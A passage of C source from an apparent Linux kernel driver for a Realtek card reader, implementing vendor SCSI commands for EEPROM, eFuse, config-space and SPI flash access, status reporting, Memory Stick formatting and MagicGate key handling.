vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
rtsx_stor_set_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
vfree(buf);
return TRANSPORT_GOOD;
}
static int write_eeprom2(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned short addr, len, i;
int retval;
u8 *buf;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
addr = ((u16)srb->cmnd[4] << 8) | srb->cmnd[5];
len = ((u16)srb->cmnd[6] << 8) | srb->cmnd[7];
len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
buf = (u8 *)vmalloc(len);
if (buf == NULL) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
rtsx_stor_get_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
for (i = 0; i < len; i++) {
retval = spi_write_eeprom(chip, addr + i, buf[i]);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
vfree(buf);
return TRANSPORT_GOOD;
}
static int read_efuse(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int retval;
u8 addr, len, i;
u8 *buf;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
addr = srb->cmnd[4];
len = srb->cmnd[5];
buf = (u8 *)vmalloc(len);
if (!buf) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
for (i = 0; i < len; i++) {
retval = rtsx_read_efuse(chip, addr + i, buf + i);
if (retval != STATUS_SUCCESS) {
vfree(buf);
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
len = (u8)min(scsi_bufflen(srb), (unsigned int)len);
rtsx_stor_set_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
vfree(buf);
return TRANSPORT_GOOD;
}
static int write_efuse(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int retval, result = TRANSPORT_GOOD;
u16 val;
u8 addr, len, i;
u8 *buf;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
addr = srb->cmnd[4];
len = srb->cmnd[5];
len = (u8)min(scsi_bufflen(srb), (unsigned int)len);
buf = (u8 *)vmalloc(len);
if (buf == NULL) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
rtsx_stor_get_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
retval = rtsx_force_power_on(chip, SSC_PDCTL);
if (retval != STATUS_SUCCESS) {
vfree(buf);
TRACE_RET(chip, TRANSPORT_ERROR);
}
if (chip->asic_code) {
retval = rtsx_read_phy_register(chip, 0x08, &val);
if (retval != STATUS_SUCCESS) {
vfree(buf);
TRACE_RET(chip, TRANSPORT_ERROR);
}
retval = rtsx_write_register(chip, PWR_GATE_CTRL, LDO3318_PWR_MASK, LDO_OFF);
if (retval != STATUS_SUCCESS) {
vfree(buf);
TRACE_RET(chip, TRANSPORT_ERROR);
}
wait_timeout(600);
retval = rtsx_write_phy_register(chip, 0x08, 0x4C00 | chip->phy_voltage);
if (retval != STATUS_SUCCESS) {
vfree(buf);
TRACE_RET(chip, TRANSPORT_ERROR);
}
retval = rtsx_write_register(chip, PWR_GATE_CTRL, LDO3318_PWR_MASK, LDO_ON);
if (retval != STATUS_SUCCESS) {
vfree(buf);
TRACE_RET(chip, TRANSPORT_ERROR);
}
wait_timeout(600);
}
retval = card_power_on(chip, SPI_CARD);
if (retval != STATUS_SUCCESS) {
vfree(buf);
TRACE_RET(chip, TRANSPORT_ERROR);
}
wait_timeout(50);
for (i = 0; i < len; i++) {
retval = rtsx_write_efuse(chip, addr + i, buf[i]);
if (retval != STATUS_SUCCESS) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
result = TRANSPORT_FAILED;
TRACE_GOTO(chip, Exit);
}
}
Exit:
vfree(buf);
retval = card_power_off(chip, SPI_CARD);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
if (chip->asic_code) {
retval = rtsx_write_register(chip, PWR_GATE_CTRL, LDO3318_PWR_MASK, LDO_OFF);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
wait_timeout(600);
retval = rtsx_write_phy_register(chip, 0x08, val);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
retval = rtsx_write_register(chip, PWR_GATE_CTRL, LDO3318_PWR_MASK, LDO_ON);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
}
return result;
}
static int read_cfg_byte(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int retval;
u8 func, func_max;
u16 addr, len;
u8 *buf;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
func = srb->cmnd[3];
addr = ((u16)(srb->cmnd[4]) << 8) | srb->cmnd[5];
len = ((u16)(srb->cmnd[6]) << 8) | srb->cmnd[7];
RTSX_DEBUGP("%s: func = %d, addr = 0x%x, len = %d\n", __func__, func, addr, len);
if (CHK_SDIO_EXIST(chip) && !CHK_SDIO_IGNORED(chip)) {
func_max = 1;
} else {
func_max = 0;
}
if (func > func_max) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
buf = (u8 *)vmalloc(len);
if (!buf) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
retval = rtsx_read_cfg_seq(chip, func, addr, buf, len);
if (retval != STATUS_SUCCESS) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
vfree(buf);
TRACE_RET(chip, TRANSPORT_FAILED);
}
len = (u16)min(scsi_bufflen(srb), (unsigned int)len);
rtsx_stor_set_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
vfree(buf);
return TRANSPORT_GOOD;
}
static int write_cfg_byte(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int retval;
u8 func, func_max;
u16 addr, len;
u8 *buf;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
func = srb->cmnd[3];
addr = ((u16)(srb->cmnd[4]) << 8) | srb->cmnd[5];
len = ((u16)(srb->cmnd[6]) << 8) | srb->cmnd[7];
RTSX_DEBUGP("%s: func = %d, addr = 0x%x\n", __func__, func, addr);
if (CHK_SDIO_EXIST(chip) && !CHK_SDIO_IGNORED(chip)) {
func_max = 1;
} else {
func_max = 0;
}
if (func > func_max) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
len = (unsigned short)min(scsi_bufflen(srb), (unsigned int)len);
buf = (u8 *)vmalloc(len);
if (!buf) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
rtsx_stor_get_xfer_buf(buf, len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - len);
retval = rtsx_write_cfg_seq(chip, func, addr, buf, len);
if (retval != STATUS_SUCCESS) {
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_WRITE_ERR);
vfree(buf);
TRACE_RET(chip, TRANSPORT_FAILED);
}
vfree(buf);
return TRANSPORT_GOOD;
}
static int app_cmd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int result;
switch (srb->cmnd[2]) {
case PP_READ10:
case PP_WRITE10:
result = read_write(srb, chip);
break;
case READ_HOST_REG:
result = read_host_reg(srb, chip);
break;
case WRITE_HOST_REG:
result = write_host_reg(srb, chip);
break;
case GET_VAR:
result = get_variable(srb, chip);
break;
case SET_VAR:
result = set_variable(srb, chip);
break;
case DMA_READ:
case DMA_WRITE:
result = dma_access_ring_buffer(srb, chip);
break;
case READ_PHY:
result = read_phy_register(srb, chip);
break;
case WRITE_PHY:
result = write_phy_register(srb, chip);
break;
case ERASE_EEPROM2:
result = erase_eeprom2(srb, chip);
break;
case READ_EEPROM2:
result = read_eeprom2(srb, chip);
break;
case WRITE_EEPROM2:
result = write_eeprom2(srb, chip);
break;
case READ_EFUSE:
result = read_efuse(srb, chip);
break;
case WRITE_EFUSE:
result = write_efuse(srb, chip);
break;
case READ_CFG:
result = read_cfg_byte(srb, chip);
break;
case WRITE_CFG:
result = write_cfg_byte(srb, chip);
break;
case SET_CHIP_MODE:
result = set_chip_mode(srb, chip);
break;
case SUIT_CMD:
result = suit_cmd(srb, chip);
break;
case GET_DEV_STATUS:
result = get_dev_status(srb, chip);
break;
default:
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
return result;
}
static int read_status(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
u8 rtsx_status[16];
int buf_len;
unsigned int lun = SCSI_LUN(srb);
rtsx_status[0] = (u8)(chip->vendor_id >> 8);
rtsx_status[1] = (u8)(chip->vendor_id);
rtsx_status[2] = (u8)(chip->product_id >> 8);
rtsx_status[3] = (u8)(chip->product_id);
rtsx_status[4] = (u8)lun;
if (CHECK_LUN_MODE(chip, SD_MS_2LUN)) {
if (chip->lun2card[lun] == SD_CARD) {
rtsx_status[5] = 2;
} else {
rtsx_status[5] = 3;
}
} else {
if (chip->card_exist) {
if (chip->card_exist & XD_CARD) {
rtsx_status[5] = 4;
} else if (chip->card_exist & SD_CARD) {
rtsx_status[5] = 2;
} else if (chip->card_exist & MS_CARD) {
rtsx_status[5] = 3;
} else {
rtsx_status[5] = 7;
}
} else {
rtsx_status[5] = 7;
}
}
if (CHECK_LUN_MODE(chip, SD_MS_2LUN)) {
rtsx_status[6] = 2;
} else {
rtsx_status[6] = 1;
}
rtsx_status[7] = (u8)(chip->product_id);
rtsx_status[8] = chip->ic_version;
if (check_card_exist(chip, lun)) {
rtsx_status[9] = 1;
} else {
rtsx_status[9] = 0;
}
if (CHECK_LUN_MODE(chip, SD_MS_2LUN)) {
rtsx_status[10] = 0;
} else {
rtsx_status[10] = 1;
}
if (CHECK_LUN_MODE(chip, SD_MS_2LUN)) {
if (chip->lun2card[lun] == SD_CARD) {
rtsx_status[11] = SD_CARD;
} else {
rtsx_status[11] = MS_CARD;
}
} else {
rtsx_status[11] = XD_CARD | SD_CARD | MS_CARD;
}
if (check_card_ready(chip, lun)) {
rtsx_status[12] = 1;
} else {
rtsx_status[12] = 0;
}
if (get_lun_card(chip, lun) == XD_CARD) {
rtsx_status[13] = 0x40;
} else if (get_lun_card(chip, lun) == SD_CARD) {
struct sd_info *sd_card = &(chip->sd_card);
rtsx_status[13] = 0x20;
if (CHK_SD(sd_card)) {
if (CHK_SD_HCXC(sd_card))
rtsx_status[13] |= 0x04;
if (CHK_SD_HS(sd_card))
rtsx_status[13] |= 0x02;
} else {
rtsx_status[13] |= 0x08;
if (CHK_MMC_52M(sd_card))
rtsx_status[13] |= 0x02;
if (CHK_MMC_SECTOR_MODE(sd_card))
rtsx_status[13] |= 0x04;
}
} else if (get_lun_card(chip, lun) == MS_CARD) {
struct ms_info *ms_card = &(chip->ms_card);
if (CHK_MSPRO(ms_card)) {
rtsx_status[13] = 0x38;
if (CHK_HG8BIT(ms_card))
rtsx_status[13] |= 0x04;
#ifdef SUPPORT_MSXC
if (CHK_MSXC(ms_card))
rtsx_status[13] |= 0x01;
#endif
} else {
rtsx_status[13] = 0x30;
}
} else {
if (CHECK_LUN_MODE(chip, DEFAULT_SINGLE)) {
#ifdef SUPPORT_SDIO
if (chip->sd_io && chip->sd_int) {
rtsx_status[13] = 0x60;
} else {
rtsx_status[13] = 0x70;
}
#else
rtsx_status[13] = 0x70;
#endif
} else {
if (chip->lun2card[lun] == SD_CARD) {
rtsx_status[13] = 0x20;
} else {
rtsx_status[13] = 0x30;
}
}
}
rtsx_status[14] = 0x78;
if (CHK_SDIO_EXIST(chip) && !CHK_SDIO_IGNORED(chip)) {
rtsx_status[15] = 0x83;
} else {
rtsx_status[15] = 0x82;
}
buf_len = min(scsi_bufflen(srb), (unsigned int)sizeof(rtsx_status));
rtsx_stor_set_xfer_buf(rtsx_status, buf_len, srb);
scsi_set_resid(srb, scsi_bufflen(srb) - buf_len);
return TRANSPORT_GOOD;
}
static int get_card_bus_width(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned int lun = SCSI_LUN(srb);
u8 card, bus_width;
if (!check_card_ready(chip, lun)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
card = get_lun_card(chip, lun);
if ((card == SD_CARD) || (card == MS_CARD)) {
bus_width = chip->card_bus_width[lun];
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_UNRECOVER_READ_ERR);
TRACE_RET(chip, TRANSPORT_FAILED);
}
scsi_set_resid(srb, 0);
rtsx_stor_set_xfer_buf(&bus_width, scsi_bufflen(srb), srb);
return TRANSPORT_GOOD;
}
static int spi_vendor_cmd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int result;
unsigned int lun = SCSI_LUN(srb);
u8 gpio_dir;
if (CHECK_PID(chip, 0x5208) && CHECK_PID(chip, 0x5288)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
rtsx_force_power_on(chip, SSC_PDCTL);
rtsx_read_register(chip, CARD_GPIO_DIR, &gpio_dir);
rtsx_write_register(chip, CARD_GPIO_DIR, 0x07, gpio_dir & 0x06);
switch (srb->cmnd[2]) {
case SCSI_SPI_GETSTATUS:
result = spi_get_status(srb, chip);
break;
case SCSI_SPI_SETPARAMETER:
result = spi_set_parameter(srb, chip);
break;
case SCSI_SPI_READFALSHID:
result = spi_read_flash_id(srb, chip);
break;
case SCSI_SPI_READFLASH:
result = spi_read_flash(srb, chip);
break;
case SCSI_SPI_WRITEFLASH:
result = spi_write_flash(srb, chip);
break;
case SCSI_SPI_WRITEFLASHSTATUS:
result = spi_write_flash_status(srb, chip);
break;
case SCSI_SPI_ERASEFLASH:
result = spi_erase_flash(srb, chip);
break;
default:
rtsx_write_register(chip, CARD_GPIO_DIR, 0x07, gpio_dir);
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
rtsx_write_register(chip, CARD_GPIO_DIR, 0x07, gpio_dir);
if (result != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
return TRANSPORT_GOOD;
}
static int vendor_cmnd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int result;
switch (srb->cmnd[1]) {
case READ_STATUS:
result = read_status(srb, chip);
break;
case READ_MEM:
result = read_mem(srb, chip);
break;
case WRITE_MEM:
result = write_mem(srb, chip);
break;
case READ_EEPROM:
result = read_eeprom(srb, chip);
break;
case WRITE_EEPROM:
result = write_eeprom(srb, chip);
break;
case TOGGLE_GPIO:
result = toggle_gpio_cmd(srb, chip);
break;
case GET_SD_CSD:
result = get_sd_csd(srb, chip);
break;
case GET_BUS_WIDTH:
result = get_card_bus_width(srb, chip);
break;
#ifdef _MSG_TRACE
case TRACE_MSG:
result = trace_msg_cmd(srb, chip);
break;
#endif
case SCSI_APP_CMD:
result = app_cmd(srb, chip);
break;
case SPI_VENDOR_COMMAND:
result = spi_vendor_cmd(srb, chip);
break;
default:
set_sense_type(chip, SCSI_LUN(srb), SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
return result;
}
#if !defined(LED_AUTO_BLINK) && !defined(REGULAR_BLINK)
void led_shine(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned int lun = SCSI_LUN(srb);
u16 sec_cnt;
if ((srb->cmnd[0] == READ_10) || (srb->cmnd[0] == WRITE_10)) {
sec_cnt = ((u16)(srb->cmnd[7]) << 8) | srb->cmnd[8];
} else if ((srb->cmnd[0] == READ_6) || (srb->cmnd[0] == WRITE_6)) {
sec_cnt = srb->cmnd[4];
} else {
return;
}
if (chip->rw_cap[lun] >= GPIO_TOGGLE_THRESHOLD) {
toggle_gpio(chip, LED_GPIO);
chip->rw_cap[lun] = 0;
} else {
chip->rw_cap[lun] += sec_cnt;
}
}
#endif
static int ms_format_cmnd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
struct ms_info *ms_card = &(chip->ms_card);
unsigned int lun = SCSI_LUN(srb);
int retval, quick_format;
if (get_lun_card(chip, lun) != MS_CARD) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if ((srb->cmnd[3] != 0x4D) || (srb->cmnd[4] != 0x47) ||
(srb->cmnd[5] != 0x66) || (srb->cmnd[6] != 0x6D) ||
(srb->cmnd[7] != 0x74)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
if (!check_card_ready(chip, lun) ||
(get_card_size(chip, lun) == 0)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
if (srb->cmnd[8] & 0x01) {
quick_format = 0;
} else {
quick_format = 1;
}
if (!(chip->card_ready & MS_CARD)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (chip->card_wp & MS_CARD) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_PROTECT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (!CHK_MSPRO(ms_card)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
retval = mspro_format(srb, chip, MS_SHORT_DATA_LEN, quick_format);
if (retval != STATUS_SUCCESS) {
set_sense_type(chip, lun, SENSE_TYPE_FORMAT_CMD_FAILED);
TRACE_RET(chip, TRANSPORT_FAILED);
}
scsi_set_resid(srb, 0);
return TRANSPORT_GOOD;
}
#ifdef SUPPORT_PCGL_1P18
static int get_ms_information(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
struct ms_info *ms_card = &(chip->ms_card);
unsigned int lun = SCSI_LUN(srb);
u8 dev_info_id, data_len;
u8 *buf;
unsigned int buf_len;
int i;
if (!check_card_ready(chip, lun)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if ((get_lun_card(chip, lun) != MS_CARD)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if ((srb->cmnd[2] != 0xB0) || (srb->cmnd[4] != 0x4D) ||
(srb->cmnd[5] != 0x53) || (srb->cmnd[6] != 0x49) ||
(srb->cmnd[7] != 0x44)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
dev_info_id = srb->cmnd[3];
if ((CHK_MSXC(ms_card) && (dev_info_id == 0x10)) ||
(!CHK_MSXC(ms_card) && (dev_info_id == 0x13)) ||
!CHK_MSPRO(ms_card)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (dev_info_id == 0x15) {
buf_len = data_len = 0x3A;
} else {
buf_len = data_len = 0x6A;
}
buf = kmalloc(buf_len, GFP_KERNEL);
if (!buf) {
TRACE_RET(chip, TRANSPORT_ERROR);
}
i = 0;
/* GET Memory Stick Media Information Response Header */
buf[i++] = 0x00; /* Data length MSB */
buf[i++] = data_len; /* Data length LSB */
/* Device Information Type Code */
if (CHK_MSXC(ms_card)) {
buf[i++] = 0x03;
} else {
buf[i++] = 0x02;
}
/* SGM bit */
buf[i++] = 0x01;
/* Reserved */
buf[i++] = 0x00;
buf[i++] = 0x00;
buf[i++] = 0x00;
/* Number of Device Information */
buf[i++] = 0x01;
/* Device Information Body */
/* Device Information ID Number */
buf[i++] = dev_info_id;
/* Device Information Length */
if (dev_info_id == 0x15) {
data_len = 0x31;
} else {
data_len = 0x61;
}
buf[i++] = 0x00; /* Data length MSB */
buf[i++] = data_len; /* Data length LSB */
/* Valid Bit */
buf[i++] = 0x80;
if ((dev_info_id == 0x10) || (dev_info_id == 0x13)) {
/* System Information */
memcpy(buf+i, ms_card->raw_sys_info, 96);
} else {
/* Model Name */
memcpy(buf+i, ms_card->raw_model_name, 48);
}
rtsx_stor_set_xfer_buf(buf, buf_len, srb);
if (dev_info_id == 0x15) {
scsi_set_resid(srb, scsi_bufflen(srb)-0x3C);
} else {
scsi_set_resid(srb, scsi_bufflen(srb)-0x6C);
}
kfree(buf);
return STATUS_SUCCESS;
}
#endif
static int ms_sp_cmnd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
int retval = TRANSPORT_ERROR;
if (srb->cmnd[2] == MS_FORMAT) {
retval = ms_format_cmnd(srb, chip);
}
#ifdef SUPPORT_PCGL_1P18
else if (srb->cmnd[2] == GET_MS_INFORMATION) {
retval = get_ms_information(srb, chip);
}
#endif
return retval;
}
#ifdef SUPPORT_CPRM
static int sd_extention_cmnd(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
unsigned int lun = SCSI_LUN(srb);
int result;
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
sd_cleanup_work(chip);
if (!check_card_ready(chip, lun)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if ((get_lun_card(chip, lun) != SD_CARD)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
switch (srb->cmnd[0]) {
case SD_PASS_THRU_MODE:
result = sd_pass_thru_mode(srb, chip);
break;
case SD_EXECUTE_NO_DATA:
result = sd_execute_no_data(srb, chip);
break;
case SD_EXECUTE_READ:
result = sd_execute_read_data(srb, chip);
break;
case SD_EXECUTE_WRITE:
result = sd_execute_write_data(srb, chip);
break;
case SD_GET_RSP:
result = sd_get_cmd_rsp(srb, chip);
break;
case SD_HW_RST:
result = sd_hw_rst(srb, chip);
break;
default:
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
return result;
}
#endif
#ifdef SUPPORT_MAGIC_GATE
static int mg_report_key(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
struct ms_info *ms_card = &(chip->ms_card);
unsigned int lun = SCSI_LUN(srb);
int retval;
u8 key_format;
RTSX_DEBUGP("--%s--\n", __func__);
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
ms_cleanup_work(chip);
if (!check_card_ready(chip, lun)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if ((get_lun_card(chip, lun) != MS_CARD)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (srb->cmnd[7] != KC_MG_R_PRO) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (!CHK_MSPRO(ms_card)) {
set_sense_type(chip, lun, SENSE_TYPE_MG_INCOMPATIBLE_MEDIUM);
TRACE_RET(chip, TRANSPORT_FAILED);
}
key_format = srb->cmnd[10] & 0x3F;
RTSX_DEBUGP("key_format = 0x%x\n", key_format);
switch (key_format) {
case KF_GET_LOC_EKB:
if ((scsi_bufflen(srb) == 0x41C) &&
(srb->cmnd[8] == 0x04) &&
(srb->cmnd[9] == 0x1C)) {
retval = mg_get_local_EKB(srb, chip);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
break;
case KF_RSP_CHG:
if ((scsi_bufflen(srb) == 0x24) &&
(srb->cmnd[8] == 0x00) &&
(srb->cmnd[9] == 0x24)) {
retval = mg_get_rsp_chg(srb, chip);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
break;
case KF_GET_ICV:
ms_card->mg_entry_num = srb->cmnd[5];
if ((scsi_bufflen(srb) == 0x404) &&
(srb->cmnd[8] == 0x04) &&
(srb->cmnd[9] == 0x04) &&
(srb->cmnd[2] == 0x00) &&
(srb->cmnd[3] == 0x00) &&
(srb->cmnd[4] == 0x00) &&
(srb->cmnd[5] < 32)) {
retval = mg_get_ICV(srb, chip);
if (retval != STATUS_SUCCESS) {
TRACE_RET(chip, TRANSPORT_FAILED);
}
} else {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
break;
default:
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
scsi_set_resid(srb, 0);
return TRANSPORT_GOOD;
}
static int mg_send_key(struct scsi_cmnd *srb, struct rtsx_chip *chip)
{
struct ms_info *ms_card = &(chip->ms_card);
unsigned int lun = SCSI_LUN(srb);
int retval;
u8 key_format;
RTSX_DEBUGP("--%s--\n", __func__);
rtsx_disable_aspm(chip);
if (chip->ss_en && (rtsx_get_stat(chip) == RTSX_STAT_SS)) {
rtsx_exit_ss(chip);
wait_timeout(100);
}
rtsx_set_stat(chip, RTSX_STAT_RUN);
ms_cleanup_work(chip);
if (!check_card_ready(chip, lun)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_NOT_PRESENT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (check_card_wp(chip, lun)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_WRITE_PROTECT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if ((get_lun_card(chip, lun) != MS_CARD)) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_LUN_NOT_SUPPORT);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (srb->cmnd[7] != KC_MG_R_PRO) {
set_sense_type(chip, lun, SENSE_TYPE_MEDIA_INVALID_CMD_FIELD);
TRACE_RET(chip, TRANSPORT_FAILED);
}
if (!CHK_MSPRO(ms_card)) {
set_sense_type(chip, lun, SENSE_TYPE_MG_INCOMPATIBLE_MEDIUM);
TRACE_RET(chip, TRANSPORT_FAILED);
}
key_format = srb->cmnd[10] & 0x3F;
RTSX_DEBUGP("key_format = 0x%x\n", key_format);
switch (key_format) {
case KF_SET_LEAF_ID:
if ((scsi_bufflen(srb) == 0x0C) &&
(srb->cmnd[8] == 0x00) &&
